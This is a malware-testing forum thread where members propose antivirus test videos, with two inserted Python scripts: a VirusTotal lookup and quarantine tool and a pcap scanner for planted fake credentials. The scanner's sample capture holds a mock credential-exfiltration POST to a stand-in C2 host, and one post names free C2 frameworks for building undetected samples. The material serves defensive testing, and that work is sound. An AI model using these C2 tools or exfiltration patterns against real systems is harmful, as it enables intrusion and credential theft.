Make your video test requests!

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I have a fabulous idea.

How about a vid of Windows default security, with a folder of executables and URLs on the desktop for testing. This time, though, try something so simple: upload each executable to VirusTotal; if it's flagged, you delete the sample. Same with the URLs: instead of navigating to them directly, copy the URL and upload it to VT; if it's flagged, the same, it gets deleted. Then scan the system at the end with MD.
I like your idea :)
I can scan the entire VM with MD, but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal.
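The VT step of the test idea quoted above, as a script. This is an added example and not code from the thread: it looks each file up on VirusTotal by SHA-256 (nothing is uploaded, so a sample stays private), looks each URL up by its VT URL id, and moves whatever VT flags into a quarantine folder rather than deleting it outright. It assumes the VirusTotal API v3 endpoints `/files/{sha256}` and `/urls/{id}` and an API key in a `VT_API_KEY` environment variable; the folder layout and the `_quarantine` name are this example's own choices.

```python
"""Triage a downloads folder and a URL list against VirusTotal before running anything.

Added example for the "good habits" test idea in the thread; not the thread's
own code. Files are looked up by SHA-256 (no upload), URLs by their VT URL id,
and anything VT flags is moved to a quarantine folder so it can still be
inspected. A hash VT has never seen is reported as UNKNOWN; that is not a
CLEAN verdict. Assumes VT API v3 and an API key in VT_API_KEY (assumption).
"""
import base64
import hashlib
import json
import os
import shutil
import sys
import urllib.error
import urllib.request
from pathlib import Path
from typing import Callable, Dict, Iterable, Optional, Tuple

VT_API = "https://www.virustotal.com/api/v3"
Report = Optional[dict]                     # VT JSON object, or None when VT has no record
Lookup = Callable[[str, str], Report]       # (kind, ident) -> Report; swappable for testing


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def vt_url_id(url: str) -> str:
    """VT addresses a URL by its unpadded URL-safe base64 encoding."""
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


def vt_lookup(kind: str, ident: str, api_key: str) -> Report:
    """GET /files/{sha256} or /urls/{url_id}; None on 404 (never submitted to VT)."""
    req = urllib.request.Request(f"{VT_API}/{kind}/{ident}", headers={"x-apikey": api_key})
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


def verdict(report: Report, min_hits: int = 1) -> str:
    """FLAGGED when >= min_hits engines say malicious/suspicious, CLEAN otherwise, UNKNOWN if no record."""
    if report is None:
        return "UNKNOWN"
    stats = report["data"]["attributes"]["last_analysis_stats"]
    hits = stats.get("malicious", 0) + stats.get("suspicious", 0)
    return "FLAGGED" if hits >= min_hits else "CLEAN"


def classify(items: Iterable[Tuple[str, str, str]], lookup: Lookup, min_hits: int = 1) -> Dict[str, str]:
    """items are (label, kind, ident) triples; returns {label: verdict}."""
    return {label: verdict(lookup(kind, ident), min_hits) for label, kind, ident in items}


def triage_folder(folder: Path, urls: Iterable[str], lookup: Lookup, quarantine: Path) -> Dict[str, str]:
    """Classify every file in folder plus the given URLs; move FLAGGED files into quarantine."""
    files = [p for p in sorted(folder.iterdir()) if p.is_file()]
    items = [(p.name, "files", sha256_of(p)) for p in files]
    items += [(u, "urls", vt_url_id(u)) for u in urls]
    results = classify(items, lookup)
    for p in files:
        if results[p.name] == "FLAGGED":
            quarantine.mkdir(parents=True, exist_ok=True)
            shutil.move(str(p), str(quarantine / p.name))
    return results


if __name__ == "__main__":
    # usage: python vt_triage.py <folder> [url ...]   (VT_API_KEY must be set)
    key = os.environ["VT_API_KEY"]
    folder = Path(sys.argv[1])
    res = triage_folder(folder, sys.argv[2:], lambda k, i: vt_lookup(k, i, key), folder / "_quarantine")
    for label, v in res.items():
        print(f"{v:8} {label}")
```

Two things worth noting when using this for a video test: VT's free API is rate limited to a few lookups per minute, so a big folder takes a while, and the UNKNOWN rows are the interesting ones. Those are exactly the samples the thread author says are hard to find, and they are the only ones that actually test the product rather than VT.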
 

ShenguiTurmi

Level 3
Well-known
Feb 28, 2023
126
I like your idea :)
I can scan the entire VM with MD, but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal.
Completely unknown sample? For simulating targeted attacks?
You can do it yourself; although CobaltStrike is expensive, there are many free alternatives.
MetaSploit+Venom/NimLoader, PoshC2, Sliver, Nimbo-C2 and Empire are all free.
Most of the IDCs I have contacted have a positive and supportive attitude towards this kind of attack-simulation test, so as long as you contact the IDC/VPS supplier in advance, they will not oppose you doing so, and if you accidentally leak the sample to the Internet, they will help you block some abuse complaints that are not clear.
 

likeastar20

Level 9
Verified
Mar 24, 2016
423
I like your idea :)
I can scan the entire VM with MD, but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal.
I often help people remove malware; maybe you could do some tests where you infect the machine with malware and then enable protection. It would be fun to see who is good at disinfecting a machine. I suppose AVs that have rollback would do better?
 

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I often help people remove malware; maybe you could do some tests where you infect the machine with malware and then enable protection. It would be fun to see who is good at disinfecting a machine. I suppose AVs that have rollback would do better?

This kind of off-series video is planned :)
 

ForgottenSeer 109138

I like your idea :)
I can scan the entire VM with MD, but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal.
1. The point is to use good habits and see how it fares, not whether one can mess a machine up and see if it fixes itself.

2. That's the same as having to hand-pick malware that will bypass any product you test and see if it fails.

Thank you for making my point.
 

Jonny Quest

Level 22
Verified
Top Poster
Well-known
Mar 2, 2023
1,156
1. The point is to use good habits and see how it fares, not whether one can mess a machine up and see if it fixes itself.
Good point: if a person hypothetically let themselves get to that point, what irreversible damage (or stolen data) may have occurred that would require a complete Windows reinstall/reset, which an AV couldn't repair?

Maybe continue testing for prevention. Never mind what was mentioned a day or two ago about testing combinations of AVs and other security apps; that could keep Shadowra busy for years with the possible 425 different combinations :oops:
 

ForgottenSeer 109138

Good point: if a person hypothetically let themselves get to that point, what irreversible damage (or stolen data) may have occurred that would require a complete Windows reinstall/reset, which an AV couldn't repair?

Maybe continue testing for prevention. Never mind what was mentioned a day or two ago about testing combinations of AVs and other security apps; that could keep Shadowra busy for years with the possible 425 different combinations :oops:
Rather, the point being whether a person "intentionally" messes up their machine to see if it repairs itself.

With admin privileges and malicious intentions a user could give their OS and just about any product a bad day.

I just want to see a test of a machine where the user has good habits, uploads all unknown and known downloads and URLs to VT when unsure, and how they would fare.

Not a set-up-for-failure video, hand-picking its doom. A legit, in-the-wild, not PoC or hand-picked, good-habits video.
 

Azazel

I would like to see WHHLight, WDAC only, Super Safe setup against executables (.sys, .exe, .com, .dll, .ocx, .msi, .mst, .msp, .appx, .scr, .wsf, .tmp)
 

BSONE

Level 2
Feb 17, 2024
79
Any chance of doing an updated Norton review? I would be curious to see how Sonar behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product.
 

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I second that Norton should be tested, as it appears no one has tested them recently.
Any chance of doing an updated Norton review? I would be curious to see how Sonar behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product.

Yep :)
 

TuxTalk

Level 14
Verified
Top Poster
Well-known
Nov 9, 2022
650
Any chance of doing an updated Norton review? I would be curious to see how Sonar behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product.
Nothing new; still the same as before. Norton is very solid and recommendable.
 

likeastar20

Level 9
Verified
Mar 24, 2016
423

Attachments

  • Screenshot_30-3-2024_172857_euce1-110-nfr.sentinelone.net.jpeg

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630

ForgottenSeer 109138

How about a good habit vs security test.

I will link a video below that I recently posted on how to extract the proof you would need.

Grab a copy of Wireshark and place it on your test machine. Grab some "RATs", aka "infostealers", to test against for the desktop folder. Create fake credentials throughout the test system, in the browser, Notepad, etc. This time, instead of static testing, make this a dynamic test only. Start Wireshark before you start the test, thus creating a pcap ("packet capture") of the entire test. Execute each sample, giving some space ("time intervals") in between each one, to see if the product not only stops the infection but does so in time: at the end, you will be able to use the pcap from Wireshark to see if the product actually stopped it before information was leaked, thus saving the user from themselves, since most of these are done via phishing emails. Knowledge, common sense and good habits vs. security: a video to see which would spare a user his/her credentials.

Post in thread 'What are you Browsing Now?'
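The "check the pcap at the end" step of the dynamic test above, as a script. This is an added example, not code or the video from the post: it reads a classic pcap, pulls the TCP/UDP payload out of each IPv4 frame, and reports every packet that carries one of the fake credentials planted on the VM, either verbatim or base64-encoded, together with its destination and its offset in seconds from the start of the capture, so each hit can be matched to the sample that was running in that time interval. The canary strings, the capture-start timestamp and the sample capture are constructed here for illustration. Two caveats: Wireshark saves pcapng by default, so export as classic pcap (or capture with tcpdump) before feeding it to this parser, and only cleartext or base64 copies on the wire are matched; a sample that exfiltrates over TLS will not show up, and needs an intercepting proxy or endpoint-side capture instead.

```python
"""Search a packet capture for planted fake credentials ("canaries").

Added example for the dynamic-test idea in the thread; not the poster's code.
Only classic microsecond pcap with Ethernet frames is parsed (no pcapng), and
only cleartext or base64-encoded copies of a canary are matched, so TLS
exfiltration is invisible here. Canaries and the sample pcap are constructed.
"""
import base64
import struct
from typing import Dict, Iterator, List, Optional, Tuple

LINKTYPE_ETHERNET = 1


def pcap_records(data: bytes) -> Iterator[Tuple[float, bytes]]:
    """Yield (timestamp_seconds, frame_bytes) for each record in a classic pcap file."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":          # magic 0xa1b2c3d4 written little-endian
        end = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic microsecond pcap (pcapng/nanosecond pcap not handled)")
    linktype = struct.unpack_from(end + "HHiIII", data, 4)[5]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24                                     # global header is 24 bytes
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def l4_payload(frame: bytes) -> Optional[Tuple[str, int, bytes]]:
    """Return (dst_ip, dst_port, payload) for an IPv4 TCP or UDP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # ethertype must be IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    dst_ip = ".".join(str(b) for b in frame[30:34])
    l4 = 14 + ihl
    if proto == 6 and len(frame) >= l4 + 20:                 # TCP: skip header by data offset
        dport = struct.unpack_from("!H", frame, l4 + 2)[0]
        payload = frame[l4 + (frame[l4 + 12] >> 4) * 4:]
    elif proto == 17 and len(frame) >= l4 + 8:               # UDP: fixed 8-byte header
        dport = struct.unpack_from("!H", frame, l4 + 2)[0]
        payload = frame[l4 + 8:]
    else:
        return None
    return dst_ip, dport, payload


def find_leaks(pcap: bytes, canaries: List[str], t0: float) -> List[Dict[str, object]]:
    """Every packet carrying a canary (raw or base64) with its offset from t0 in seconds."""
    hits: List[Dict[str, object]] = []
    for ts, frame in pcap_records(pcap):
        parsed = l4_payload(frame)
        if parsed is None:
            continue
        dst_ip, dport, payload = parsed
        for canary in canaries:
            needles = (canary.encode(), base64.b64encode(canary.encode()))
            if any(n in payload for n in needles):
                hits.append({"t_offset": round(ts - t0, 3), "dst": f"{dst_ip}:{dport}", "canary": canary})
    return hits


# --- constructed sample capture, standing in for the real Wireshark pcap ----------
def build_frame(dst_ip: str, dport: int, payload: bytes) -> bytes:
    """Minimal Ethernet/IPv4/TCP frame with zeroed MACs and checksums (enough for the parser)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes([10, 0, 0, 5]), bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", 49152, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames: List[Tuple[float, bytes]]) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, frame in frames:
        sec = int(ts)
        out += struct.pack("<IIII", sec, int((ts - sec) * 1e6), len(frame), len(frame)) + frame
    return out


CANARIES = ["canary-user@example.test", "Pa55w0rd-CANARY-7731"]   # fake creds planted on the VM
T0 = 1_700_000_000.0                                                # capture start (constructed)
SAMPLE_PCAP = build_pcap([
    (T0 + 1.0, build_frame("93.184.216.34", 443, b"\x16\x03\x01\x00\x05hello")),             # unrelated
    (T0 + 41.5, build_frame("198.51.100.7", 80,
        b"POST /gate HTTP/1.1\r\nHost: c2.example.test\r\n\r\n"
        b"user=canary-user@example.test&pw=Pa55w0rd-CANARY-7731")),                          # cleartext
    (T0 + 95.2, build_frame("203.0.113.9", 8080, base64.b64encode(b"Pa55w0rd-CANARY-7731"))),  # base64
])

if __name__ == "__main__":
    for hit in find_leaks(SAMPLE_PCAP, CANARIES, T0):
        print(f"+{hit['t_offset']:>8.3f}s  {hit['canary']}  ->  {hit['dst']}")
```

Against the constructed capture this reports two hits at +41.5 s to 198.51.100.7:80 (both canaries in one POST) and one at +95.2 s to 203.0.113.9:8080 (the password, base64-encoded); with the real capture, compare each offset to the interval in which you launched each sample. Unique canaries per location (browser store, Notepad file, etc.) also tell you which store the sample read.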

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
Hello :)

Here are the 3 tests I'll be publishing at the beginning of next week (it's starting to get nice in my house, so I'm resting a bit ^^ )

I'll get back to you as soon as these 3 videos are out. Note that I updated my recording software; the image will be better ;)

Enjoy! :D

[Image: rush.png]
 
